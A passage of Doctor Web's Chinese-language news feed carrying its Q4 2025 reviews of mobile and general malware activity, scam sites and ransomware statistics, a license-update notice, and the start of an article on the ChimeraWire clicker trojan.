    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Program.FakeMoney&amp;lng=cn"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;侦测据谎称用户通过执行某些操作或任务就可赚钱的应用程序。这些程序模拟奖励累积，称积累到一定的金额就可用“提现”，但实际上用户根本不可能得到任何付款。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;一中用于监控安卓设备用户的程序，可读取短信、获取通话信息、追踪设备位置并录制音频。&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;最常见的风险程序&lt;/b&gt;&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2025/december/review_mobile_q4/03_riskware_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2025/december/review_mobile_q4/03_riskware_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;使用工具NP Manager修改过的的安卓应用程序。此类程序中嵌入了一个特殊模块，可修改数字签名并绕过验证。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Tool.LuckyPatcher&amp;lng=cn"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;一种能够修改已安装安卓应用（为其创建补丁）的工具，功能是改变其运行逻辑或绕过某些限制。例如，用户可借助此工具尝试禁用银行应用对ROOT权限的侦测，或在游戏中获取无限资源。该工具会从网络下载专门编写的脚本来创建补丁，而这些脚本可由任何用户编写并上传至公共数据库。此类脚本可能包含恶意功能，因此生成的补丁可能具有潜在风险。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Tool.Androlua&amp;lng=cn"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;使用Lua脚本编程语言的安卓程序开发专用框架的多个危险版本。Lua应用程序的主要逻辑位于相应的脚本中，这些脚本在执行前由解释器进行加密和解密。通常此框架会请求提供各种系统权限，这样通过其执行的Lua脚本会根据得到的权限执行不同的恶意操作。&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;最常见的广告软件&lt;/b&gt;&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2025/december/review_mobile_q4/04_adware_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2025/december/review_mobile_q4/04_adware_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Adware.AdPush&amp;lng=cn"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Adware.Adpush&amp;lng=cn"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;一类可嵌入安卓应用的广告模块，通过展示容易误导用户的通知进行广告推送，如将广告伪装成操作系统通知的样式。此外，这些模块还能收集多种敏感数据，并具备下载其他应用并静默触发其安装的能力。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Bastion.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;侦测会定期创建误导性通知的所谓优化程序，这些通知谎称内存不足或存在系统错误，其目的是在所谓“优化”过程中显示广告。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Airpush.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;嵌入在安卓应用中的软件模块，用于显示各种广告。不同版本和变种所显示的广告可以是通知、弹出窗口或横幅广告。攻击者通常利用这些模块传播恶意软件，诱使用户安装特定软件。这些模块还会将各种机密信息传输到远程服务器。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Adware.ModAd&amp;lng=cn"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;WhatsAppMessenger的某些修改版，内含代码可在使用Messenger时通过网络图片加载指定链接，利用这些地址重定向到广告网站，例如在线赌场和博彩公司、成人网站。&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;GooglePlay中的威胁&lt;/h3&gt;

&lt;p&gt;2025年第四季度，我公司反病毒分析师在Google Play目录中发现超过20个属于 &lt;a href="https://vms.drweb.cn/search/?q=Android.Joker&amp;lng=cn"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; 家族的木马程序，功能是擅自为用户订阅付费服务。这些木马伪装成各种软件进行传播，包括即时通讯工具、各类系统优化工具、图像编辑软件、电影播放器等等。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2025/december/review_mobile_q4/05_Android.Joker_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2025/december/review_mobile_q4/05_Android.Joker_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;侦测到的 &lt;b&gt;Android.Joker&lt;/b&gt; 恶意软件示例。&lt;b&gt;Android.Joker.2496&lt;/b&gt; 伪装成用于“清理垃圾”的手机工具Useful Cleaner，而另一个变种 &lt;b&gt;Android.Joker.2495&lt;/b&gt; 则伪装成电影播放器Reel Drama&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;我们的专家还发现了几个属于 &lt;a href="https://vms.drweb.cn/search/?q=Android.FakeApp&amp;lng=cn"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; 家族的新的虚假应用。与之前一样，其中一些是伪装成金融应用来加载欺诈网站。另一些则伪装成游戏。在特定条件下（如用户的IP地址符合攻击者的要求），会加载博彩网站和在线赌场网站。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2025/december/review_mobile_q4/06_Android.FakeApp.1910_1_Chicken_Road_Fun.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2025/december/review_mobile_q4/06_Android.FakeApp.1910_1_Chicken_Road_Fun.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;游戏“Chicken Road Fun”实际上是伪造程序 &lt;b&gt;Android.FakeApp.1910&lt;/b&gt;，所谓功能只是幌子，加载的是一个在线赌场网站。&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;我们建议用户安装Dr.Web安卓保护产品来保护安卓设备，抵御恶意程序和不良程序。&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q4%202025%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;失陷指标&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.cn/show/?i=15099&amp;lng=cn</guid><title>Doctor Web：2025年第四季度病毒活动综述</title><link>https://news.drweb.cn/show/?i=15099&amp;lng=cn&amp;c=5</link><pubDate>Mon, 12 Jan 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;2026.01.12&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Dr.Web产品侦测统计信息显示，2025年第四季度侦测到的威胁总数与第三季度相比增长了 16.05%。独特威胁的数量下降了 1.13%。最常见的恶意软件类型是不良广告软件、恶意脚本以及各种恶意软件程序，包括下载器和广告木马。&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;电子邮件流量中最常侦测到的是木马程序，包括下载器、密码窃取程序和投放器。此外，漏洞利用程序、后门程序和各种恶意脚本也再通过电子邮件传播。 &lt;/p&gt;

&lt;p&gt;受到勒索软件感染的用户最常遭遇的加密器是 &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;、&lt;a href="https://vms.drweb.cn/search/?q=Trojan.Encoder.41868&amp;lng=cn"&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt;&lt;/a&gt; 和 &lt;a href="https://vms.drweb.cn/search/?q=Trojan.Encoder.29750&amp;lng=cn"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt;。 &lt;/p&gt;

&lt;p&gt;10 月份，我们&lt;a href="https://news.drweb.com/show/?i=15076&amp;lng=en" target="_blank"&gt;通报了&lt;/a&gt;一个针对安卓设备的后门程序 &lt;a href="https://vms.drweb.cn/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;，网络犯罪分子将其嵌在即时通讯软件Telegram X是修改版中。这个恶意软件会窃取 Telegram 帐户的登录名和密码以及其他机密数据。病毒编写者利用这个后门可管理被黑受害者的账户，还能完全控制即时通讯软件本身，以用户身份执行各种操作。 &lt;/p&gt;

&lt;p&gt;11 月，我公司反病毒实验室发布了一项&lt;a href="https://news.drweb.com/show/?i=15078&amp;lng=en" target="_blank"&gt;研究报告&lt;/a&gt;，分析了 Cavalry Werewolf 黑客组织对俄罗斯政府机构发起的定向攻击。在分析过程中，Doctor Web 的专家识别出攻击者在其攻击活动中所使用的众多恶意工具，其中包括一些开源工具。我们对该组织的特征及其在受感染网络中的典型行为也进行了分析。 &lt;/p&gt;

&lt;p&gt;12 月，我公司官网发布专门介绍名为 &lt;a href="https://vms.drweb.cn/search/?q=Trojan.ChimeraWire&amp;lng=cn"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; 的独特木马的&lt;a href="https://news.drweb.cn/show/?i=15090&amp;lng=cn" target="_blank"&gt;材料&lt;/a&gt;。该木马通过伪装真人用户操作来提升网站的访问量，规避反机器人机制的拦截，会根据攻击者提供的参数，在搜索引擎中自动搜索相关网站并在打开点击网页。有多个恶意应用程序可将&lt;a href="https://vms.drweb.cn/search/?q=Trojan.ChimeraWire&amp;lng=cn"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; 注入计算机，这些应用程序利用的是 DLL 搜索顺序劫持漏洞，并使用反调试技术来逃避侦测。&lt;/p&gt;

&lt;p&gt;第四季度，我公司互联网分析团队发现了一些承诺潜在受害者可以快速轻松地赚钱的新诈骗网站。此外，还发现一些钓鱼网站和假冒网店的虚假网站。 &lt;/p&gt;

&lt;p&gt;同时，我们的专家在 Google Play 应用商店中发现新恶意软件，包括为安卓设备用户订阅付费服务的&lt;a href="https://vms.drweb.cn/search/?q=Android.Joker&amp;lng=cn"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; 木马以及用于实施各种诈骗活动的恶意应用&lt;a href="https://vms.drweb.cn/search/?q=Android.FakeApp&amp;lng=cn"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;。而Dr.Web Security Space移动设备保护产品的侦测统计数据则显示，针对安卓平台的银行木马活动有所增加。&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;第四季度主要趋势&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;在受保护设备侦测到的威胁数量增加&lt;/li&gt;
        &lt;li&gt;进攻所使用的独特新威胁数量下降&lt;/li&gt;
        &lt;li&gt;被勒索软件感染的文件解密请求增加&lt;/li&gt;
        &lt;li&gt;针对安卓设备用户的银行木马活动增多&lt;/li&gt;
        &lt;li&gt;入侵安卓用户的 Telegram 帐户的后门程序&lt;a href="https://vms.drweb.cn/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;正在传播&lt;/li&gt;
        &lt;li&gt;Google Play出现新威胁&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Doctor Web统计服务收集的数据&lt;/h3&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/01_stat_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/01_stat_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;2025年第四季度最常见威胁：&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen31.34463&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;用Go编程语言编写的木马程序，专门用于向目标系统植入各类挖矿工具和广告软件。为DLL文件形式，存储路径为&lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;。木马利用 torrent 客户端 uTorrent 的 DLL 搜索顺序劫持漏洞来进行启动。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;广告软件，经常用于盗版软件的中转安装器。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.7&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;恶意脚本，无限循环搜索带有文本&lt;span class="string"&gt;mode extensions&lt;/span&gt;、&lt;span class="string"&gt;разработчика&lt;/span&gt; 和 &lt;span class="string"&gt;розробника&lt;/span&gt;的窗口，并向其发送Escape 按钮被按事件，迫使窗口关闭。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.4268&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;侦测浏览器插件WinSafe的恶意组件。该组件是一个 JavaScript 脚本，会在浏览器不断显示广告。 &lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Siggen.33379&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;假冒的浏览器广告拦截器Adblock Plus，由其他恶意应用程序安装到系统，用于显示广告。&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;邮箱流量恶意程序统计数据&lt;/h3&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/02_mail_traffic_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/02_mail_traffic_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;2025年第四季度邮箱流量中最常见的威胁：&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;利用 Microsoft Office文档漏洞的木马下载器家族，功能是将其他恶意软件下载到受攻击的计算机。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2017-11882.123&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2018-0798.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Microsoft Office 漏洞利用程序，可执行任意代码。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1413&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;侦测木马 &lt;a href="https://vms.drweb.cn/search/?q=Trojan.AutoIt.289&amp;lng=cn"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt;的打包版本，该木马使用 AutoIt 脚本语言编写，与其他恶意应用程序（包括挖矿程序、后门程序和自传播模块）捆绑在一起传播。&lt;a href="https://vms.drweb.cn/search/?q=Trojan.AutoIt.289&amp;lng=cn"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; 能够执行各种恶意操作，目的是增加主要有效恶意载荷的侦测难度。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Phishing.791&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;在系统安装有效负载的恶意 JavaScript 脚本。&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;加密器&lt;/h3&gt;

&lt;p&gt;2025年第四季度勒索木马受害者的文件解密申请量较第三季度上升1.15%。&lt;/p&gt;

&lt;p&gt;Doctor Web公司技术支持部门接收到的解密申请量动态：&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/03_encoder_requests_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/03_encoder_requests_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;2025年第四季度最常见的加密器：&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 占用户申请的24.90% &lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; — 占用户申请的4.21% &lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.cn/search/?q=Trojan.Encoder.29750&amp;lng=cn"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt; — 占用户申请的3.42%&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.cn/search/?q=Trojan.Encoder.26996&amp;lng=cn"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt; — 占用户申请的2.68%&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.30356 &lt;/b&gt; — 占用户申请的0.38%&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;网络诈骗&lt;/h3&gt;

&lt;p&gt;2025年第四季度，我公司网络分析师注意到有一些新的虚假网店出现。诈骗分子冒充平台诱骗潜在受害者参与类似轮盘赌的“旋转木马”游戏，声称有机会赢取奖品。经过多次尝试后，用户会“幸运”中奖，但领取奖金必须先支付运费，然后是保险费、税费等等。在某些情况下，受害者会被告知想要的商品缺货，并建议兑换成现金。然而拿到现金也必须支付一笔“手续费”。如果用户同意，还会被要求支付其他费用，例如保险费、账户激活费等等。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/04_fake_market_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/04_fake_market_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;一个提供“赠品”的虚假购物网站示例 &lt;/em&gt;&lt;/p&gt;

&lt;p&gt;不建议网站和恶意网站的数据库还新增了一些诈骗分子出售虚假剧院门票的在线资源。这些网站提供热门剧目的门票，价格通常都很诱人。然而，付款后，受害者根本收不到想要的门票，实际上是把钱拱手打给了骗子。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/05_fake_bilet_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/05_fake_bilet_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;一个出售根本不存在的电影票的诈骗网站。 &lt;/em&gt;&lt;/p&gt;

&lt;p&gt;此外，还发现了一些模仿私人影院网站并提供电影票的资源。受害者在这些网站购买电影票也不会拿到什么电影票。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/06_fake_cinema_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/06_fake_cinema_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;虚假私人影院网站 &lt;/em&gt;&lt;/p&gt;

&lt;p&gt;我们的专家发现了一些网络钓鱼资源，其中包括虚假的直播网站。攻击者利用这些网站诱骗用户输入用户名和密码进行身份验证，试图借此获取用户帐户信息。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/07_fake_steam_login_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/07_fake_steam_login_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;一个通过模仿直播网站诱骗潜在受害者登录账户的钓鱼网站 &lt;/em&gt;&lt;/p&gt;

&lt;p&gt;此外，诈骗分子再次引诱潜在受害者参与所谓的投资项目。其中一个网站建议美国的俄语用户将250美元投资给一个名为&lt;em&gt;Federal Invest（“联邦投资”）&lt;/em&gt;的项目，并声称“三个月内最高可赚取9万美元”，还谎称该项目有唐纳德•特朗普等人参与创建。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/08_fake_invest_rus_amer_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/08_fake_invest_rus_amer_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;一个声称有机会参与“高收益投资项目” 的诈骗网站 &lt;/em&gt;&lt;/p&gt;

&lt;p&gt;另一个网站则欺骗乌兹别克斯坦用户加入其宣传的所谓由一家大型控股公司参与的项目后，第一个月内即可获得高达 1500 万乌兹别克斯坦卢布的收益。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/09_fake_usm_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/09_fake_usm_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;一个承诺乌兹别克斯坦居民参与“投资项目”即可获得巨额利润的诈骗网站。&lt;/em&gt;&lt;/p&gt;

&lt;div class="notrecommend"&gt;
    &lt;a href="http://antifraud.drweb.cn/dangerous_urls/"&gt;了解Dr.Web不建议访问网站更多详情 &lt;/a&gt;
&lt;/div&gt;

&lt;h3&gt;移动设备恶意软件和不良软件&lt;/h3&gt;

&lt;p&gt;根据移动设备保护产品Dr.WebSecuritySpace的侦测统计，2025年第四季度侦测最多的是会不断显示广告的广告木马&lt;a href="https://vms.drweb.cn/search/?q=Android.MobiDash&amp;lng=cn"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;和&lt;a href="https://vms.drweb.cn/search/?q=Android.HiddenAds&amp;lng=cn"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;，紧随其后的是&lt;b&gt;Android.Siggen&lt;/b&gt;家族木马。过去的三个月中银行木马的活动显著增加，其中增长最多的是&lt;a href="https://vms.drweb.cn/search/?q=Android.Banker&amp;lng=cn"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;家族木马。&lt;/p&gt;

&lt;p&gt;不良程序中最常见的是经CloudInject云服务修改后的安卓应用程序（Dr.Web反病毒软件将其侦测为&lt;a href="https://vms.drweb.cn/search/?q=Program.CloudInject&amp;lng=cn"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;）。最常见的风险软件是&lt;b&gt;Tool.NPMod&lt;/b&gt;，是使用NP Manager工具修改过的应用程序。广告应用中最多的仍是可嵌入到软件中&lt;a href="https://vms.drweb.cn/search/?q=Adware.Adpush&amp;lng=cn"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;。&lt;/p&gt;

&lt;p&gt;10月份，我公司专家&lt;a href="https://news.drweb.com/show/?i=15076&amp;lng=en" target="_blank"&gt;通报了&lt;/a&gt;危险的后门程序&lt;a href="https://vms.drweb.cn/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;，攻击者将其嵌入到TelegramX即时通讯软件的非官方修改版中。这个恶意软件会窃取Telegram帐户的登录名和密码以及其他敏感数据。此外，还让网络犯罪分子能够控制受害者的账户，并可直接控制即时通讯软件，更改其运行逻辑。&lt;/p&gt;

&lt;p&gt;在过去一个季度中，我公司的反病毒实验室在Google Play目录中侦测到了新的恶意软件，包括为受害者注册付费服务的木马&lt;a href="https://vms.drweb.cn/search/?q=Android.Joker&amp;lng=cn"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;以及用于欺诈活动的各种伪造程序&lt;a href="https://vms.drweb.cn/search/?q=Android.FakeApp&amp;lng=cn"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;。&lt;/p&gt;

&lt;p&gt;第四季度主要移动安全事件：&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;广告木马仍然是最常见的安卓威胁&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.cn/search/?q=Android.Banker&amp;lng=cn"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; 银行木马攻击有所增加&lt;/li&gt;
    &lt;li&gt;嵌入在TelegramX的修改版中的危险后门程序&lt;a href="https://vms.drweb.cn/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;正在传播&lt;/li&gt;
    &lt;li&gt;GooglePlay目录再次出现新威胁&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;2025年第四季度份移动威胁更多详情请参阅&lt;a href="https://news.drweb.cn/show/?i=15101&amp;lng=cn" target="_blank"&gt;移动威胁综述&lt;/a&gt;.&lt;/p&gt;</description></item><item><guid>https://news.drweb.cn/show/?i=15095&amp;lng=cn</guid><title>Dr.Web FixIt!许可协议更新!</title><link>https://news.drweb.cn/show/?i=15095&amp;lng=cn&amp;c=5</link><pubDate>Mon, 29 Dec 2025 14:04:35 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;我公司产品Dr.Web FixIt!的许可协议已更新，可打开&lt;a href="https://license.drweb.com/agreement"&gt;https://license.drweb.com/agreement&lt;/a&gt;查看新版许可协议。&lt;/newslead&gt;&lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;Dr.Web FixIt!用于对Windows操作系统工作站和服务器进行详细的安全分析，并解除侦测到的病毒威胁和潜在漏洞。产品主要优势在于能够发现其他网络安全工具不能侦测的最新恶意软件和定向攻击所使用的程序。&lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;Dr.Web FixIt!首先面向的是监控计算机基础设施安全和分析网络安全事件的专业人员。但即便没有专门的SOC团队，也能利用这一解决方案诊断工作站和/或服务器存在的威胁，并在侦测到威胁后执行相应的解除操作。如需我公司专家可协助分析Dr.Web FixIt!所获取的信息。获取这样的技术支持需购买专家支持证书。&lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;此解决方案可在我公司&lt;a href="https://partners.drweb.cn/find_partner/?lng=cn"&gt;合作伙伴&lt;/a&gt;处购买。&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.cn/show/?i=15090&amp;lng=cn</guid><title>击败怪物Chimera的贝勒罗丰做梦也想不到的事： 木马ChimeraWire借模仿人类行为提升网站访问量</title><link>https://news.drweb.cn/show/?i=15090&amp;lng=cn&amp;c=5</link><pubDate>Mon, 08 Dec 2025 12:02:25 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;2025年12月8日&lt;/b&gt;&lt;/p&gt;

&lt;h3&gt;简介&lt;/h3&gt;

&lt;p&gt;在分析我公司的一个合作伙伴联盟计划的过程中，我们的专家发现了一种具有点击器功能的独特恶意软件并将其命名为&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;。该恶意软件运行于Windows系统，其基础是用于自动管理网站和Web应用的开源码zlsgo和Rod程序。&lt;/p&gt;

